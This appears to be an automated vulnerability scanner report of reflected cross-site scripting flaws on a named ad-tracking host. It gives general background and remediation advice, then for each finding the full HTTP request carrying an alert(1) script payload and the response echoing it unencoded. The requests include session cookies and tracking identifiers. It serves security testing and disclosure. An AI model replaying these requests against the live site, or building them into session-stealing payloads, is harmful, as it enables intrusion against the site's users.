Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 9221e<script>alert(1)</script>94174a81006 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=4809221e<script>alert(1)</script>94174a81006&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 4809221e<script>alert(1)</script>94174a81006-SM=adver_05-05-2011-00-59-58; expires=Sun, 08-May-2011 00:59:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4809221e<script>alert(1)</script>94174a81006-VT=adver_05-05-2011-00-59-58_7451664491304557198; expires=Tue, 03-May-2016 00:59:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 4809221e<script>alert(1)</script>94174a81006-nUID=adver_7451664491304557198; expires=Thu, 05-May-2011 01:14:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='4809221e<script>alert(1)</script>94174a81006';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='7451664491304557198';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='
...[SNIP]...

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload d7f22<script>alert(1)</script>7b75f73abf2 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adverd7f22<script>alert(1)</script>7b75f73abf2&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:56 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:59:56 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadverd7f22%3Cscript%3Ealert%281%29%3C%2Fscript%3E7b75f73abf2_05-05-2011-00-59-56_3893459661304557196; expires=Tue, 03-May-2016 00:59:56 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adverd7f22%3Cscript%3Ealert%281%29%3C%2Fscript%3E7b75f73abf2_3893459661304557196; expires=Thu, 05-May-2011 01:14:56 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adverd7f22<script>alert(1)</script>7b75f73abf2';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='389345966130455
...[SNIP]...

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7acb7<script>alert(1)</script>73974861fc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/7acb7<script>alert(1)</script>73974861fc3&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:27 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 01:00:27 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-27_14374677881304557227; expires=Tue, 03-May-2016 01:00:27 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_14374677881304557227; expires=Thu, 05-May-2011 01:15:27 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='14374677881304557227';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/7acb7<script>alert(1)</script>73974861fc3';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 93c9a<script>alert(1)</script>cc2d4b62d7a was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=93c9a<script>alert(1)</script>cc2d4b62d7a&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:01 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 01:00:01 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-01_3147161271304557201; expires=Tue, 03-May-2016 01:00:01 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_3147161271304557201; expires=Thu, 05-May-2011 01:15:01 GMT; path=/; domain=c3metrics.com
Content-Length: 6698
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='3147161271304557201';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='93c9a<script>alert(1)</script>cc2d4b62d7a';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 93096<script>alert(1)</script>716cb79c236 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=7293096<script>alert(1)</script>716cb79c236&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sat, 02-May-2843 01:00:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-00_1648367301304557200; expires=Tue, 03-May-2016 01:00:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_1648367301304557200; expires=Thu, 05-May-2011 01:15:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='1648367301304557200';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='7293096<script>alert(1)</script>716cb79c236';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload ebffd<script>alert(1)</script>c867e4ea0b4 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=ebffd<script>alert(1)</script>c867e4ea0b4&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:02 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 01:00:02 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-02_7091964531304557202; expires=Tue, 03-May-2016 01:00:02 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_7091964531304557202; expires=Thu, 05-May-2011 01:15:02 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
S.c3VJSnuid='7091964531304557202';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='ebffd<script>alert(1)</script>c867e4ea0b4';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 5f4c4<script>alert(1)</script>6979d01a44c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=4805f4c4<script>alert(1)</script>6979d01a44c&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:37 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s1; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=4805f4c4<script>alert(1)</script>6979d01a44c&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7e328<script>alert(1)</script>7a09c59ed8f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver7e328<script>alert(1)</script>7a09c59ed8f&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:15 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Content-Type: text/html
Set-Cookie: SERVERID=s15; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver7e328<script>alert(1)</script>7a09c59ed8f&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload f789d<script>alert(1)</script>2df104e1cea was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=72f789d<script>alert(1)</script>2df104e1cea HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
